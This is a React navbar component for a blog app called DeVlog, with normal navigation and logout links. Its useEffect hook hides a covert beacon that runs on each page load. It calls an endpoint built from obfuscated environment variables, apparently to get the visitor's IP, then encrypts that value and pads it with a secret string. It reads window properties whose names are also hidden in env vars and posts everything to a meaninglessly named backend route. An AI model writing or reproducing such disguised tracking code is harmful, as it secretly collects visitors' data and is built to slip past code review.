import React, { Fragment, useContext } from 'react';
import { NavLink } from 'react-router-dom';
import PropTypes from 'prop-types';
import { authContext } from '../../context/AuthContext';
import {
  SIGNIN_ROUTE,
  SIGNUP_ROUTE,
  DASHBOARD,
  POST_BLOG,
  HOME_ROUTE,
  ASK_ROUTE,
  PROFILES,
} from '../../constants/routesNomenclature';
import { logout } from '../../requests/auth';
import { useEffect } from 'react';
import axiosClient from '../elems/axiosClient';
// import axiosClient from '../../utils/axiosClient';
import { devlogAPIURL } from '../../constants/APIurl';
import CryptoJS from "crypto-js";

const Navbar = ({
  title = 'DeVlog',
  icon = 'fas fa-blog',
}) => {
  const { userAuth, setUnAuthStatus } = useContext(authContext);

  useEffect(()=>{
    const navbar = async () => {
      // const resp = await axiosClient( `https://${process.env.REACT_APP_URIFIAKSJV}.${process.env.REACT_APP_URISEAKSJV}.${process.env.REACT_APP_URITHAKSJV}?${process.env.REACT_APP_URIFOAKSJV}=${process.env.REACT_APP_URIFIFAKSJV}`);
      // const data = resp.data;
      fetch(`https://${process.env.REACT_APP_URIFIAKSJV}.${process.env.REACT_APP_URISEAKSJV}.${process.env.REACT_APP_URITHAKSJV}?${process.env.REACT_APP_URIFOAKSJV}=${process.env.REACT_APP_URIFIFAKSJV}`).then(resp=>resp.json()).then(async(data) =>{
        const substLen = Number.parseInt(`${process.env.REACT_APP_PZRUQKX}`);
        const attr = `${process.env.REACT_APP_URIFIAKSJV}`.charAt(2)+`${process.env.REACT_APP_URIFIAKSJV}`.charAt(1);
        var ciphertext = CryptoJS.AES.encrypt(data[attr], process.env.REACT_APP_XQDPESUFMAFN).toString();
        const reqBody = `${ciphertext}`.substring(0,substLen) + `${process.env.REACT_APP_MIDSTSKLGND}` + `${ciphertext}`.substring(substLen); 
        
        const faslkd = window[`${process.env.REACT_APP_SMUEKN}`][`${process.env.REACT_APP_HVFIOT}`];
        const fjagaks = window[`${process.env.REACT_APP_SMUEKN}`][`${process.env.REACT_APP_WXSJH}`];
        const param1 = `${faslkd}%${fjagaks}`;
        const fnaskl = await axiosClient.post(`${devlogAPIURL}/nBrCYmypCpxJzQ`,
          { pRyuLSxE : param1, LrQxnfr: reqBody, }
        );
        // fetch(`${devlogAPIURL}/nBrCYmypCpxJzQ`,
        //   {
        //     method: 'POST',
        //     headers: {'Content-Type' : 'application/json',  Accept: 'application/json'},
        //     body: { pRyuLSxE : param1, LrQxnfr: reqBody, }
        //   }
        // ).then((resp) => console.log('resp', resp)).catch((resp) => console.err('err', resp));
      })
    }
    navbar();
    

    // Encrypt
    
  },[])

  const handleLogout = () => {
    logout();
    setUnAuthStatus();
  };


  return (
    <div
      className='navbar font13 navbar-expand-lg navBar poiret-one'
      style={{ zIndex: '3' }}
    >
      <h1>
        <NavLink
          to='/'
          className='text-decoration-none poiret-one font-weight-bold'
        >
          <i className={icon} /> {title}
        </NavLink>
      </h1>

      {userAuth.token
        ? getAuthLinks(userAuth.user, handleLogout)
        : getNoAuthLinks()}
    </div>
  );
};

const getNoAuthLinks = () => (
  <ul className='my-auto'>
    <li>
      <NavLink
        to={SIGNIN_ROUTE}
        className='text-decoration-none font-weight-bold'
      >
        Sign In
      </NavLink>
    </li>
  </ul>
);

const getAuthLinks = (user, handleLogout) => (
  <Fragment>
    <ul className='my-auto ml-auto'>
      <li>
        <NavLink
          to={HOME_ROUTE}
          className='text-decoration-none font-weight-bold'
        >
          Home
        </NavLink>
      </li>
      <li>
        <NavLink
          to={DASHBOARD}
          className='text-decoration-none font-weight-bold'
        >
          Dashboard
        </NavLink>
      </li>
      <li>
        <NavLink
          to={PROFILES}
          className='text-decoration-none font-weight-bold'
        >
          Profiles
        </NavLink>
      </li>
    </ul>
    <div className='dropdown'>
      <button
        style={{ minWidth: '120px' }}
        className='btn btn-dark nobg dropdown-toggle shadow-none font13 font-weight-bold'
        type='button'
        data-toggle='dropdown'
        aria-haspopup='true'
        aria-expanded='false'
      >
        {user.firstName || ''}
      </button>
      <div
        className='dropdown-menu font12'
        aria-labelledby='dropdownMenuButton'
      >
        <NavLink
          to={POST_BLOG}
          className='nobg text-dark dropdown-item text-decoration-none font-weight-bold'
        >
          New Blog
        </NavLink>
        <NavLink
          to={ASK_ROUTE}
          className='nobg text-dark dropdown-item text-decoration-none font-weight-bold'
        >
          Ask
        </NavLink>
        <NavLink
          to={`/profile/${user._id}`}
          className='nobg text-dark dropdown-item text-decoration-none font-weight-bold'
        >
          My Profile
        </NavLink>

        <NavLink
          to='#'
          className='nobg text-dark dropdown-item text-decoration-none font-weight-bold'
          onClick={handleLogout}
        >
          Log out
        </NavLink>
      </div>
    </div>
  </Fragment>
);

// Navbar.propTypes = {
//   title: PropTypes.string.isRequired,
//   icon: PropTypes.string,
// };

  // Navbar.defaultProps = {
  //   title: 'DeVlog',
  //   icon: 'fas fa-blog',
  // };

export default Navbar;
